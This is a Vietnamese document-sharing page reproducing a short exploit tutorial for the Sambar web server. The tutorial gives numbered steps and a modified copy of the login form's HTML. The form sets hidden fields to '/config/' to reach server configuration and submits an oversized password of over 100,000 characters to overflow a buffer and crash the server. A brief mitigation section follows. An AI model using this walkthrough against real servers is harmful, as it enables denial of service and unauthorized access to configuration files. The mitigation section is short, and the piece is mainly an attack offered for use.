1. Trang chủ
  2. » Công Nghệ Thông Tin

Lỗi tràn bộ đệm của Server Sambar

2 368 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Lỗi tràn bộ đệm của Server Sambar
Trường học University of Information Technology
Chuyên ngành Computer Science
Thể loại Bài báo
Năm xuất bản 2025
Thành phố Ho Chi Minh City
Định dạng
Số trang 2
Dung lượng 29,5 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Lỗi tràn bộ đệm của Server Sambar

Trang 1

Lỗi tràn bộ đệm của Server Sambar :

trang này đã được đọc lần

CÁCH KHAI THÁC:

Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser:

BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, như

http://localhost/sysuser/index.stm

BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename thành something.html

BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho

form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server CODE

[FORM METHOD=POST ACTION="http://localhost/session/login"

onsubmit="return FormValidator(this)"]

[INPUT TYPE=hidden NAME="RCpage"

VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation

[INPUT TYPE=hidden NAME="onfailure"

VALUE="http://localhost/sysuser/relogin.stm"]*bạn có thể thay đổi cái này để làm tăng việc tràn

bộ đệm giống như một script cgi (cái này có thể là tấn công bằng DoS)

[INPUT TYPE=hidden NAME="start" VALUE=1>

[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]

[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]

[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]

[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]

[INPUT TYPE=hidden NAME="RCScount" VALUE="25]

[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]

[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]

[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *Đây là vấn đề*

[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*Đây là vấn đề*

[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]

BƯỚC 4: bây giờ bạn có thể refresh và login, dùng một user và password hợp lệ nếu bạn muốn chứng tỏ một lỗi nữa ở bước 6!

BƯỚC 5: bây bạn phải nhấn submit, chờ, và nếu bạn chạy server trên máy của bạn thì server se trở nên dễ bị đổ, nếu bạn tiếp tục send thì server phải restart hoặc máy của bạn restart trong suốt quá trình tấn công!

BƯỚC 6: lỗi thứ hai là tràn bộ đệm ở vùng mật khẩu, bạn có thể chèn vào hơn 1 triệu ký tự và submit nó nhưng phải edit đoạn mã này trên máy của bạn:

CODE

[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< thay đổi cái này thành

Trang 2

[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="đặt text của bạn ở đây, nhớ là hơn 100000

ký tự"]

BƯỚC 7: nhấn submit và server !

GIẢI PHÁP:

- Thay đổi đường dẫn và thư mục của file liên quan đến user ở server sambar!

- Những người phát triển server sambar có thể thay đổi code va phát triển một module để kiểm tra việc đi lại các file của user và bộ đệm của form transfer ở chế độ POST hay GET

Ngày đăng: 02/11/2012, 14:18

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w